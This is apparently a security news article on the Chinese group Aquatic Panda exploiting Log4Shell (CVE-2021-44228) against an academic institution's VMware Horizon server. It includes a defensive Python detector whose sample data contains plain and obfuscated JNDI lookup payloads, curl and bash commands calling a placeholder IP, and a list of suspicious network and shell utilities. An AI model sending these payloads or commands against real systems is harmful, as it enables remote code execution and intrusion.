A Chinese threat group, Aquatic Panda, is abusing the Log4j vulnerability to target large academic institutions. The group has gathered credentials for further exploitation.

Aquatic Panda abuses Log4Shell

According to CrowdStrike, Aquatic Panda has been active since May 2020 and is abusing Log4Shell (CVE-2021-44228).
  • Researchers observed some abnormal activities around a Tomcat server running on a vulnerable VMware Horizon instance operated by a renowned academic institution.
  • With the help of actionable alerts, the security firm was able to discover the attack in a timely manner and mitigate it.

Attack details

The threat group is known for using tools for maintaining persistence to obtain access to intellectual property and other trade secrets.
  • In this specific attack, the attackers performed several connectivity checks via DNS lookups against a subdomain, with the activity running under the Apache Tomcat service hosted on a VMware Horizon instance.
  • The attackers then executed multiple Linux commands, including attempts to run curl and wget, and launched a bash shell with a hardcoded IP address.
  • The remote server used for these attacks was linked to Aquatic Panda.
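The activity described above leaves two kinds of traces a defender can look for: JNDI lookup strings in the Tomcat access log, and network or shell utilities (DNS lookup tools, curl, wget, bash) spawned by the Tomcat JVM, often with an IP address literal in the command line. The following is an added detection example written for this article, not CrowdStrike's or Cyware's code; the log lines, process events, host names and the 198.51.100.7 address are constructed samples, and the event field layout (parent, parent_cmd, cmd) is an assumption about how an endpoint sensor records process starts. It also goes one step beyond the article by unwrapping the nested-lookup obfuscation (`${lower:j}`, `${::-j}`) commonly used to hide the `${jndi:` string.

```python
import re

# Constructed sample Tomcat access-log lines (not from the article). Line 2 carries
# a plain JNDI lookup in the User-Agent field; line 3 carries an obfuscated one.
ACCESS_LOG = [
    '10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"',
]

# Constructed process-start events as a hypothetical endpoint sensor might record
# them (field names are an assumption). The Tomcat JVM is recognisable by the
# -Dcatalina.base property on its command line.
TOMCAT_JVM = "/usr/lib/jvm/java/bin/java -Dcatalina.base=/opt/tomcat"
PROCESS_EVENTS = [
    {"parent": "java", "parent_cmd": TOMCAT_JVM, "cmd": "nslookup abc123.example.test"},
    {"parent": "java", "parent_cmd": TOMCAT_JVM, "cmd": "curl http://198.51.100.7/x"},
    {"parent": "java", "parent_cmd": TOMCAT_JVM, "cmd": "bash /tmp/run.sh 198.51.100.7"},
    {"parent": "bash", "parent_cmd": "bash", "cmd": "ls -la"},  # benign: not a Tomcat child
]

JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Nested-lookup tricks used to hide the jndi keyword: ${lower:j}, ${upper:N}, ${::-j}
NESTED_RE = re.compile(r"\$\{(?:lower|upper):([^{}])\}|\$\{[^{}]*:-([^{}]*)\}", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Utilities that a servlet container has no business spawning directly
SUSPICIOUS_CHILDREN = {"curl", "wget", "bash", "sh", "nslookup", "dig", "host"}


def normalize_lookup(s: str) -> str:
    """Resolve Log4j lookup nesting one level at a time until the string is stable."""
    for _ in range(10):  # bounded: attackers can nest arbitrarily deep
        new = NESTED_RE.sub(lambda m: m.group(1) or m.group(2) or "", s)
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(lines):
    """Return (line_no, normalized_line) for every access-log line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookup(line)
        if JNDI_RE.search(norm):
            hits.append((n, norm))
    return hits


def find_tomcat_child_processes(events):
    """Flag network/shell utilities spawned by a Tomcat JVM and extract any IP literals."""
    findings = []
    for ev in events:
        if "catalina" not in ev["parent_cmd"]:
            continue
        argv0 = ev["cmd"].split()[0].rsplit("/", 1)[-1]  # basename of the executable
        if argv0 in SUSPICIOUS_CHILDREN:
            findings.append({"cmd": ev["cmd"], "ips": IPV4_RE.findall(ev["cmd"])})
    return findings


if __name__ == "__main__":
    for n, line in find_jndi_lookups(ACCESS_LOG):
        print(f"access log line {n}: JNDI lookup -> {line}")
    for f in find_tomcat_child_processes(PROCESS_EVENTS):
        print(f"Tomcat child process: {f['cmd']!r} ips={f['ips']}")
```

Both checks are deliberately narrow: the access-log check only fires on the lookup syntax, and the process check only fires on a short list of utilities with a Tomcat parent, so each is a high-signal alert rather than a noisy one. A DNS lookup tool spawned by the JVM is flagged even without an IP literal, since the article notes that the connectivity checks ran through DNS.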

The exploitation of Log4j continues

Mandiant and Microsoft have disclosed other Chinese groups, as well as threat groups from other countries, abusing the Log4j vulnerability.
  • Microsoft observed attacks from HAFNIUM abusing the vulnerability against virtualization infrastructure, using a DNS service typically associated with testing activity to fingerprint systems.
  • Additionally, Microsoft warned of attacks by threat groups linked to Iran, Turkey, and North Korea, all leveraging the Log4Shell vulnerability.

In the meantime, the U.S. FTC issued a warning urging companies to proactively address the flaw in the Java logging utility Log4j. Otherwise, it will use its full legal authority to pursue non-compliant firms.

Ending notes

Log4j is a component of a vast number of applications running on millions of systems across multiple industries, making the attack surface much wider than expected. Multiple government security agencies and private firms are already warning against the abuse of the vulnerabilities in Log4j. Moreover, organizations can follow Cyware's approach to handling Log4j-related issues.

Cyware Publisher